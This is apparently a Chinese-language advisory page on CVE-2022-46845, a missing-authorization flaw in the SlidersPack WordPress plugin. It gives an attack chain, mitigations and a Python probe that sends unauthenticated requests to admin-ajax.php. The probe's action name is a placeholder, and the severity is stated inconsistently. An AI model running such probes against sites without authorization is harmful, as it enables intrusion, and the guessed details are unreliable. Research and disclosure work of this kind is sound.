CVE-2022-46845 WordPress SlidersPack插件访问控制漏洞

漏洞信息

漏洞编号

CVE-2022-46845

漏洞类型

缺失授权/访问控制

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Slider a SlidersPack (WordPress插件)

漏洞概述

CVE-2022-46845是WordPress插件Slider a SlidersPack中的一个高危安全漏洞，属于Missing Authorization（缺失授权）类型。该漏洞允许未经身份验证的攻击者利用插件中配置错误的访问控制安全级别进行未授权操作。Slider a SlidersPack是一款流行的WordPress轮播图/滑块插件，广泛应用于各类网站中。攻击者无需获取任何用户凭证，即可利用此漏洞访问本应需要授权才能访问的功能和资源，可能导致敏感数据泄露、配置篡改或其他恶意操作。该漏洞影响版本从某个早期版本至2.3之前的版本，CVSS评分5.3，属于中等严重程度。鉴于该插件的普及性和漏洞的利用难度较低，建议所有使用该插件的用户立即采取修复措施。

技术细节

Slider a SlidersPack插件在访问控制方面存在严重配置错误。插件的多个端点和功能模块未能正确实施权限检查机制，导致未经认证的用户可以执行本应需要管理员权限的操作。具体而言，插件在处理AJAX请求时缺少适当的 capability check（能力检查），使得攻击者可以通过构造特定的HTTP请求来访问管理功能。该漏洞属于Broken Access Control（访问控制失效）类别，OWASP将其列为Web应用安全十大风险之首。攻击者可以利用此漏洞访问、修改或删除轮播配置，获取站点敏感信息，甚至可能在某些配置下进一步利用导致更严重的安全问题。漏洞的根本原因在于开发者过度依赖客户端验证而未在服务端进行充分的权限验证。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WordPress版本和Slider a SlidersPack插件版本

STEP 2

步骤2

攻击者确认插件版本低于2.3，确认存在缺失授权漏洞

STEP 3

步骤3

攻击者构造HTTP请求，直接访问插件的管理功能端点（如admin-ajax.php）

STEP 4

步骤4

由于插件缺少权限验证，攻击者无需提供认证凭证即可通过请求

STEP 5

步骤5

攻击者利用未授权访问获取敏感数据、修改轮播配置或执行其他恶意操作

STEP 6

步骤6

在某些配置下，攻击者可进一步利用漏洞进行横向移动或提权攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2022-46845 PoC - Slider a SlidersPack Access Control Bypass
# Target: WordPress site with Slider a SlidersPack plugin < 2.3

import requests
import sys

def check_vulnerability(target_url):
    """
    Check if the target is vulnerable to CVE-2022-46845
    Missing Authorization in Slider a SlidersPack plugin
    """
    
    # Target endpoints that may be affected
    endpoints = [
        '/wp-admin/admin-ajax.php',
        '/wp-content/plugins/sliderspack-all-in-one-image-sliders/...',
    ]
    
    # Vulnerable parameters - plugin actions without authorization check
    vulnerable_params = {
        'action': 'sliderspack_admin_action',  # Example action
        'sliderspack_nonce': '',  # Missing or bypassable nonce
    }
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] Vulnerability: Missing Authorization (CVE-2022-46845)")
    
    # Test unauthenticated access to admin functions
    try:
        response = requests.post(
            f"{target_url}/wp-admin/admin-ajax.php",
            data=vulnerable_params,
            timeout=10
        )
        
        # Check if response indicates successful unauthorized access
        if response.status_code == 200:
            # Analyze response for signs of successful exploitation
            if 'success' in response.text or 'data' in response.text:
                print("[+] Target appears to be VULNERABLE")
                print(f"[+] Response: {response.text[:200]}")
                return True
        
        print("[-] Target does not appear to be vulnerable")
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        check_vulnerability(target)
    else:
        print("Usage: python cve-2022-46845.py <target_url>")
        print("Example: python cve-2022-46845.py http://example.com")

影响范围

Slider a SlidersPack < 2.3

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 限制对wp-admin和admin-ajax.php的访问，仅允许管理员IP访问；2) 使用安全插件限制未授权用户的访问；3) 临时禁用SlidersPack插件，待官方修复后再启用；4) 实施基于IP的访问限制规则；5) 加强服务器日志监控，及时发现异常访问行为。建议优先升级到最新版本以彻底修复该漏洞。